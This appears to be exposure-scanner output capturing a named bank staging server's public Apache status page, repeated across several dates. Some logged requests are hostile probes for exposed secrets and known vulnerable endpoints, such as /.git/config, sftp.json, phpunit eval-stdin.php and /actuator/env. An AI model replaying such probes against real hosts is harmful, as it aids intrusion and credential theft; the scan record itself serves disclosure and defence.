0-21428293700/9/7414_ 0.626929669720.00.0276.29 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/11/7338_ 0.596429406830.00.0384.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21428293700/7/7326_ 0.496409874730.00.0195.48 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10296. 0.0041531817781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.0041531817833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.0041531817366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.0041531827889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.0041531817857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.0041531857622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.0041531827737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.0041531838921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.0041531817862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.0041531828023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.0041531817612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.0041531817762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.0041531807726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.0041531827895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.0041531818058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.00415318110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.0041531857212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.0041531828232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.0041531867959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.0041531817702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.0041531817941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.0041531857888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.0041531818038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.0041531818301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.0041531807972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-21428293680/28/7417_ 1.602011028240.00.0558.58 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 2-21428293680/32/7439_ 1.602
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25132b65836
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Thursday, 10-Jul-2025 23:56:50 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 213 Parent Server MPM Generation: 212 Server uptime: 212 days 6 hours 45 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 811554 - Total Traffic: 7.4 GB - Total Duration: 102978685 CPU Usage: u540.85 s739.43 cu1004.08 cs355.69 - .0144% CPU load .0442 requests/sec - 433 B/second - 9.6 kB/request - 126.891 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02533089no0yes0025000 22533088no0yes1024000 Sum200 1049000 _________________________.........................______________ ________W__..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-21225330890/12/7296_ 0.78161419588780.00.02104.67 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/11/7233_ 0.71240919339680.00.0187.19 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/12/7155_ 0.7765259534480.00.0272.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/14/7225_ 0.79161209148990.00.0271.69 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7192_ 0.69240919303570.00.0381.66 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/15/7215_ 0.791610010013430.00.0379.99 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-21225330890/12/7261_ 0.77160019484420.00.0284.76 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/14/7285_ 0.79160809705860.00.02121.18 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-21225330890/13/7283_ 0.6861019611080.00.0389.45 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/14/7234_ 0.79160719881660.00.04104.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7249_ 0.7861029363480.00.0271.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/14/7252_ 0.78215719392330.00.0487.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7196_ 0.79160509203460.00.0275.89 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-21225330890/12/7157_ 0.74160019717650.00.0398.60 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7257_ 0.7991529034540.00.02110.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/12/7169_ 0.8161539349560.00.0281.61 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/11/7238_ 0.7791019358080.00.0280.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/14/7262_ 0.69215229440970.00.02108.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/12/7275_ 0.7965719526270.00.0375.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7274_ 0.75215219264870.00.0288.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7193_ 0.7491029277140.00.0389.73 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21225330890/12/7235_ 0.78185719343250.00.03127.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21225330890/13/7299_ 0.75185209659650.00.0275.76 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-21225330890/14/7225_ 0.69185209399730.00.0283.71 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-21225330890/13/7212_ 0.7565209871180.00.0394.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.0025900517781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.0025900517833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.0025900517366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.0025900527889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.0025900517857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.0025900557622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.0025900527737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.0025900538921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.0025900517862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.0025900528023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.0025900517612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.0025900517762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.0025900507726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.0025900527895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.0025900518058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.00259005110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.0025900557212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.0025900528232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.0025900567959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.0025900517702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.0025900517941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.0025900557888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.0025900518038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.0025900518301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.0025900507972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-21225330880/31/7302_ 1.86387111014040.00.0658.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251b7c5519c
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Wednesday, 09-Jul-2025 00:59:08 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 212 Parent Server MPM Generation: 211 Server uptime: 210 days 7 hours 47 minutes 25 seconds Server load: 0.01 0.01 0.02 Total accesses: 809285 - Total Traffic: 7.4 GB - Total Duration: 102975440 CPU Usage: u534.13 s731.93 cu1001.97 cs354.91 - .0144% CPU load .0445 requests/sec - 437 B/second - 9.6 kB/request - 127.242 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02385095no0yes0025000 22385094no0yes1024000 Sum200 1049000 _________________________........................._W____________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-21123850950/0/7273_ 0.00354509588470.00.00104.64 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-21123850950/0/7209_ 0.00354509339340.00.0087.15 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-21123850950/0/7135_ 0.00354509534130.00.0072.56 127.0.0.1http/1.1127.0.1.1:8080GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-21123850950/0/7202_ 0.00354519148590.00.0071.65 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21123850950/0/7166_ 0.00354549303240.00.0081.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-21123850950/0/7191_ 0.003545010013130.00.0079.94 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 0-21123850950/0/7240_ 0.00354509484000.00.0084.72 127.0.0.1http/1.1127.0.1.1:8080GET /telescope/requests HTTP/1.1 0-21123850950/0/7260_ 0.00354509705570.00.00121.14 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-21123850950/0/7259_ 0.0074809610790.00.0089.40 127.0.0.1http/1.1127.0.1.1:8080GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 0-21123850950/0/7211_ 0.00354509881350.00.00104.86 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-21123850950/0/7227_ 0.0074809363190.00.0071.73 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-21123850950/0/7226_ 0.00354509392010.00.0087.76 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-21123850950/0/7170_ 0.00348909203090.00.0075.83 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-21123850950/0/7133_ 0.00354509717310.00.0098.56 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-21123850950/1/7236_ 0.00349419034270.00.00110.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21123850950/0/7148_ 0.00348919349230.00.0081.56 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-21123850950/0/7218_ 0.00354509357780.00.0080.95 127.0.0.1http/1.1127.0.1.1:8080GET /_all_dbs HTTP/1.1 0-21123850950/0/7238_ 0.00354509440510.00.00108.30 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 0-21123850950/1/7254_ 0.01303209526000.00.0075.02 127.0.0.1http/1.1127.0.1.1:8080GET /developmentserver/metadatauploader HTTP/1.1 0-21123850950/0/7251_ 0.00354509264540.00.0088.21 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-21123850950/0/7170_ 0.00302619276750.00.0089.68 127.0.0.1http/1.1127.0.1.1:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-21123850950/0/7210_ 0.00302609342940.00.00127.17 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-21123850950/0/7276_ 0.00354509659320.00.0075.72 127.0.0.1http/1.1127.0.1.1:8080GET /s/334323e2333313e27363e23323/_/;/META-INF/maven/com.atlass 0-21123850950/1/7202_ 0.0175339399480.00.0083.67 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-21123850950/0/7189_ 0.00354509870800.00.0094.70 127.0.0.1http/1.1127.0.1.1:8080GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP 1-209-0/0/10296. 0.008994417781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.008994417833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.008994417366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.008994427889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.008994417857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.008994457622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.008994427737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.008994438921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.008994417862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.008994428023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.008994417612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.008994417762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.008994407726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.008994427895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.008994418058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.0089944110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.008994457212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.008994428232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.008994467959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.008994417702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.008994417941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.008994457888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.008994418038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.008994418301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.008994407972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-21123850940/3/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251b3852f90
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Monday, 07-Jul-2025 03:33:52 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 210 Parent Server MPM Generation: 209 Server uptime: 208 days 10 hours 22 minutes 9 seconds Server load: 0.01 0.00 0.00 Total accesses: 806345 - Total Traffic: 7.4 GB - Total Duration: 102940534 CPU Usage: u529.57 s725.54 cu996.38 cs353.04 - .0145% CPU load .0448 requests/sec - 439 B/second - 9.6 kB/request - 127.663 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 12088846no0yes0025000 22088847no0yes1024000 Sum200 1049000 .........................___________________________________W___ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-199-0/0/7216. 0.0079042619587620.00.00104.01 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7166. 0.0079042619335660.00.0087.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7091. 0.0079042619533610.00.0072.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7160. 0.0079042619147850.00.0071.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7123. 0.0079042629293300.00.0081.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7146. 0.0079042619999580.00.0079.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7195. 0.0079042619483450.00.0084.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7224. 0.0079042619705100.00.00120.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7215. 0.0079042619610140.00.0089.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7171. 0.0079042629880580.00.00104.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7178. 0.0079042619362440.00.0071.55 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7183. 0.0079042649365450.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7124. 0.0079042629202050.00.0075.63 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7090. 0.0079042619716660.00.0098.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7188. 0.0079042619033470.00.00110.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7109. 0.0079042619341690.00.0081.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7170. 0.0079042619345470.00.0080.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7194. 0.0079042609439910.00.00108.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7204. 0.0079042669525520.00.0074.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7202. 0.0079042619259920.00.0088.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7131. 0.0079042619276110.00.0089.53 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7164. 0.0079042639338560.00.00126.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7229. 0.0079042639658680.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-199-0/0/7154. 0.0079042619376770.00.0083.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7143. 0.0079042619847980.00.0094.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/1/10283_ 0.07133107752210.00.0069.37 127.0.0.1http/1.1127.0.1.1:8080GET /geoip/ HTTP/1.1 1-20920888460/1/10252_ 0.0277227832840.00.0070.98 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/2/10255_ 0.10133637366120.00.0072.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/2/10304_ 0.0877217888830.00.0073.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/1/10272_ 0.04182417857560.00.0072.85 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/1/10303_ 0.1077717622730.00.0071.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/1/10299_ 0.07182417736810.00.0070.15 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/1/10210_ 0.0293628921670.00.0079.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/2/10328_ 0.09182907862350.00.0071.04 127.0.0.1http/1.1127.0.1.1:8080GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.1 1-20920888460/2/10209_ 0.1094108013840.00.0073.58 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-20920888460/2/10221_ 0.1047717605300.00.0168.52 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/2/10190_ 0.0947227762160.00.0070.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/3/10253_ 0.1094607725740.00.0171.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/1/10149_ 0.0347217895670.00.0069.37 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/2/10277_ 0.07107208057880.00.0068.32 127.0.0.1http/1.1127.0.1.1:8080GET /t4 HTTP/1.1 1-20920888460/2/10268_ 0.1018110410950.00.0178.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/1/10239_ 0.07107207212390.00.0069.81 127.0.0.1http/1.1127.0.1.1:8080GET /form.html HTTP/1.1 1-20920888460/2/10195_ 0.091338232150.00.0071.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-20920888460/3/10213_ 0.10107717958530.00.0172.43 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/1/10154_ 0.031307668250.00.0072.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20920888460/2/10188_ 0.07133107940810.00.0068.62 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-20920888460/1/10298_ 0.00223107888390.00.0068.35 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/gateway/routes HTTP/1.1 1-20920888460/2/10185_ 0.0793608038280.00.0068.70 127.0.0.1http/1.1127.0.1.1:8080GET /1.php HTTP/1.1 1-20920888460/2/10230_ 0.09183008300870.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET /devicedesc.xml HTTP/1.1 1-20920888460/2/10221_ 0.09182917972260.00.0168.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-20920888470/3/7171_ 0.22131111009290.00.0157.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-20920888470/5/7168
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251237d7cb4
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Saturday, 05-Jul-2025 00:14:11 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 208 Parent Server MPM Generation: 207 Server uptime: 206 days 7 hours 2 minutes 28 seconds Server load: 0.06 0.01 0.00 Total accesses: 801357 - Total Traffic: 7.4 GB - Total Duration: 102936025 CPU Usage: u523.89 s718.13 cu991.09 cs350.86 - .0145% CPU load .045 requests/sec - 444 B/second - 9.6 kB/request - 128.452 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11792707no0yes1024000 21792708no0yes0025000 Sum200 1049000 .........................W______________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-199-0/0/7216. 0.0060564519587620.00.00104.01 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7166. 0.0060564519335660.00.0087.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7091. 0.0060564519533610.00.0072.34 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-199-0/0/7160. 0.0060564519147850.00.0071.50 127.0.0.1http/1.1127.0.1.1:8080GET / 